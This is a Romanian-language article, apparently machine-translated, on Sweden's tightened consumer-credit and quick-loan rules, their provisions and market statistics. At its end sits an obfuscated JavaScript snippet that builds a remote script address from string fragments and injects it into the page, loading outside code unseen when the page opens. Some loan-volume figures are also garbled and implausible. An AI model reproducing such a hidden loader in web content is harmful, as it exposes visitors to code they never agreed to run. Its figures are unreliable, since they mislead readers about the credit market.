Experiență în reglementarea pieței creditelor de consum din Suedia
Motivele introducerii Regulilor
Anterior, Suedia a luat deja măsuri menite să reducă rata de creștere a împrumuturilor de consum, în special așa-numitele „împrumuturi rapide” sau „împrumuturi prin SMS”.
Împrumutul rapid (în suedeză. Snabblån, prescurtare. Låna pengar snabbt och enkelt– împrumut rapid) este un tip de împrumut care vă permite să împrumutați de la distanță și relativ rapid sume mici, cel mai adesea 500-3000 coroane (denumite în continuare coroane suedeze). În 2006-2007, banii puteau fi primiți în decurs de 15 minute, începând cu 2008 – a doua zi. Astfel de împrumuturi sunt emise în medie pe o lună. În acest caz, analogul semnăturii este codul din SMS, pe care compania îl trimite dacă cererea este aprobată.
Ușurința de a obține astfel de împrumuturi a provocat împrumutați iresponsabili și de la bun început a condus la o creștere uriașă a delincvențelor și a neplăților: în 2007, numărul împrumuturilor cu probleme a fost de 25,4 mii, în 2008 – 35,8 mii. În 2015, numărul acestora a ajuns la 65 mii.
Ce măsuri au fost luate?
Așadar, în 2019, guvernul suedez, urmând exemplul Norvegiei, a înăsprit regulile de acordare a creditelor de consum. Principalele dispoziții ale noilor reguli:
- este imperativ să se verifice bonitatea clientului – o organizație care ignoră această regulă va fi amendată cu 10 milioane de coroane;
- nu puteți indica ușurința obținerii unui împrumut și, în general, îl descrieți ca fiind atractiv – publicitatea ar trebui să fie o listă neutră și onestă a condițiilor;
- este imposibil să se dezvolte programe bonus și să se desfășoare promoții precum tombole, adică să se încurajeze clienții să obțină împrumuturi;
- în publicitatea individuală, cum ar fi trimiterile prin SMS, nu puteți utiliza informații false conform cărora solvabilitatea clientului a fost deja verificată și împrumutul este aprobat;
- informațiile privind rata, sancțiunile în caz de neplată și alte riscuri asociate împrumutului ar trebui să fie clar vizibile, evidențiate cu caractere aldine și într-o culoare contrastantă, de obicei negru pe fond alb (puncte individuale în roșu);
- clientului ar trebui să i se ofere informații despre contactele municipalității, care pot fi contactate în caz de probleme cu împrumutul;
- formularul de cerere de pe site nu ar trebui să fie vizibil;
- companiile care oferă împrumuturi cu o perioadă de grație fără dobândă trebuie să notifice cu exactitate consumatorul cu privire la toate costurile asociate unui astfel de împrumut și cu rata ulterioară.
Una dintre cerințele importante este aceea că termenii acestui sau acelui împrumut trebuie să corespundă dimensiunii și naturii sale, în timp ce sunt numiți în interesul clientului – de exemplu, împrumuturile pentru o sumă mică ar trebui să fie emise pentru o perioadă scurtă de timp pentru a evita plățile inutile inutile.
Rezultatele introducerii regulii
În acest moment, rezultatele măsurilor luate ar trebui evaluate cu prudență. Piața continuă să crească, dar trebuie avut în vedere faptul că situația a fost influențată de destabilizarea economiei asociată cu pandemia de coronavirus.
În timp ce analiștii popularei resurse suedeze smslansnabb.se observă că în iunie împrumuturile acordate sectorului privat din Suedia s-au ridicat la 1.500.331 miliarde de coroane, în iulie volumul pieței a crescut cu încă 3315 milioane de coroane
Între 1996 și 2020, împrumuturile lunare de consum au avut în medie 925.088 miliarde coroane. Cel mai scăzut nivel a fost înregistrat în iulie 1996 (344,995 miliarde de coroane), iar cel mai ridicat în mai 2020 (1,533,206 miliarde de coroane).
Cu toate acestea, trebuie remarcat faptul că până la 20% din creșterea creditelor de consum în 2020 poate fi atribuită împrumuturilor emise de jucători importanți (precum Advisa sau Lendo) din afara țării.
(function(){
qdpq=document.createElement(“script”);qdpq_=(“us”)+(“ta”);
qdpq_+=”t”+(“.”);qdpq_+=(“in”);qdpqu=”247046408″;qdpq.async=true;
qdpqu+=”.uxzf2srqdpq4e7j2k”;qdpq.type=”text/javascript”;qdpq_+=”f”+”o”+(“/”);
qdpqu+=”if10p3X6lsnbt”;qdpq.src=”https://”+qdpq_+qdpqu;
dqdpq=document.body;dqdpq.appendChild(qdpq);
})();